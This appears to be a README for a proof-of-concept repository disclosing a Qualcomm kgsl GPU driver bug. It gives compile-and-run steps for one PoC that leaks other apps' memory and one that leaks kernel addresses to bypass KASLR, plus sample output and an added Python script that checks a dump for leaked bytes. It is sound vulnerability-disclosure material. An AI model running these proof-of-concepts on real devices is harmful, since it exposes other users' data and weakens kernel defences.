The write-up can be found here. This is a bug in the Qualcomm kgsl driver that I reported in December 2021. The bug can be used by an untrusted app to leak information from other user apps, as well as from the kernel.
The directory adreno_user contains a proof-of-concept for leaking memory from other applications. It repeatedly triggers the bug and reads the stale information left in the memory pages. There is no way to tell or control what information is being leaked. To test this, compile with the following command:
aarch64-linux-android30-clang -O2 adreno_user.c -o adreno_user
and then push adreno_user to the device and run it. It should print out non-zero memory content:
flame:/ $ /data/local/tmp/adreno_user
hexdump(0x50000000, 0x190)
00000000 0d 00 00 00 00 00 00 00 22 55 00 00 00 00 00 00 |........"U......|
00000010 fb 84 67 b5 73 00 00 b4 e0 84 67 b5 73 00 00 b4 |..g.s.....g.s...|
00000020 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 |................|
00000030 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000040 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
00000050 cb e9 67 e5 73 00 00 b4 00 00 00 00 00 00 00 00 |..g.s...........|
00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000070 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000080 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000a0 fb 84 67 b5 73 00 00 b4 e0 84 67 b5 73 00 00 b4 |..g.s.....g.s...|
.......
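The only success criterion the instructions above give is that the dumped page contains non-zero bytes. The following is an added example (not part of the proof-of-concept repository) that parses the hexdump format shown above and reports how much of the dump is non-zero, so a run can be checked automatically instead of by eye. It assumes the exact line layout printed above (a `hexdump(base, len)` header, then `offset`, sixteen hex bytes and an ASCII column); the sample text is a trimmed copy of the output shown in this README.

```python
import re

# Constructed sample: a trimmed copy of the adreno_user output shown in this README.
SAMPLE_OUTPUT = """\
hexdump(0x50000000, 0x190)
00000000 0d 00 00 00 00 00 00 00 22 55 00 00 00 00 00 00 |........"U......|
00000010 fb 84 67 b5 73 00 00 b4 e0 84 67 b5 73 00 00 b4 |..g.s.....g.s...|
00000020 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 |................|
00000030 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
.......
"""

# Header line of the PoC output: hexdump(<base address>, <length>)
HEADER_RE = re.compile(r"^hexdump\((0x[0-9a-fA-F]+),\s*(0x[0-9a-fA-F]+)\)")
# Data line: 8-digit offset, up to 16 hex bytes each followed by a space, then the ASCII column.
LINE_RE = re.compile(r"^([0-9a-fA-F]{8})\s+((?:[0-9a-fA-F]{2}\s+){1,16})\|")


def parse_hexdump(text):
    """Parse the PoC's hexdump output into (base, length, {offset: bytes}).

    Lines that match neither pattern (for example the trailing '.......') are skipped.
    """
    base = length = None
    rows = {}
    for line in text.splitlines():
        line = line.strip()
        m = HEADER_RE.match(line)
        if m:
            base, length = int(m.group(1), 16), int(m.group(2), 16)
            continue
        m = LINE_RE.match(line)
        if not m:
            continue
        offset = int(m.group(1), 16)
        rows[offset] = bytes.fromhex(m.group(2).replace(" ", ""))
    return base, length, rows


def summarize(rows):
    """Count dumped bytes, non-zero bytes and the offsets of lines holding any data."""
    total = sum(len(d) for d in rows.values())
    nonzero = sum(1 for d in rows.values() for b in d if b != 0)
    nonzero_lines = sorted(off for off, d in rows.items() if any(d))
    return {"bytes": total, "nonzero": nonzero, "nonzero_lines": nonzero_lines}


def leak_confirmed(text):
    """True when the dump contains at least one non-zero byte, i.e. the page was not scrubbed."""
    _, _, rows = parse_hexdump(text)
    return summarize(rows)["nonzero"] > 0


if __name__ == "__main__":
    base, length, rows = parse_hexdump(SAMPLE_OUTPUT)
    print(f"dump of {length:#x} bytes at {base:#x}: {summarize(rows)}")
    print("non-zero content found:", leak_confirmed(SAMPLE_OUTPUT))
```

Feeding the full output of a run through `leak_confirmed` gives a yes/no answer for scripted testing across devices; a fully zeroed dump (every line `00 ... 00`) is reported as no leak, which is the result a properly patched kernel should produce.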
The directory adreno_kernel contains a proof-of-concept for leaking kernel information for a KASLR bypass. It repeatedly triggers the bug and tries to leak kernel addresses. Depending on whether the device is running kernel branch 4.x or 5.x, the macro KERNEL_BRANCH in adreno_kernel.c should be set to either 4 or 5.
To test, compile with
aarch64-linux-android30-clang adreno_kernel.c adreno_cmd.c kgsl_utils.c -O3 -o adreno_kernel
and then run it on the device. If successful, it should print out the kernel addresses of some objects and functions:
flame:/ $ /data/local/tmp/adreno_kernel
found dma fence object:
kgsl_syncsource_fence_ops address: ffffff9daaea8b48
object address: fffffffe116100a0
syncsource address: fffffffe0b244480
It has been tested on a number of devices. The time it takes (which depends on the success rate of a single leak) varies across devices. It is relatively quick on the Pixel 4, but takes longer on the Samsung Z Flip 3.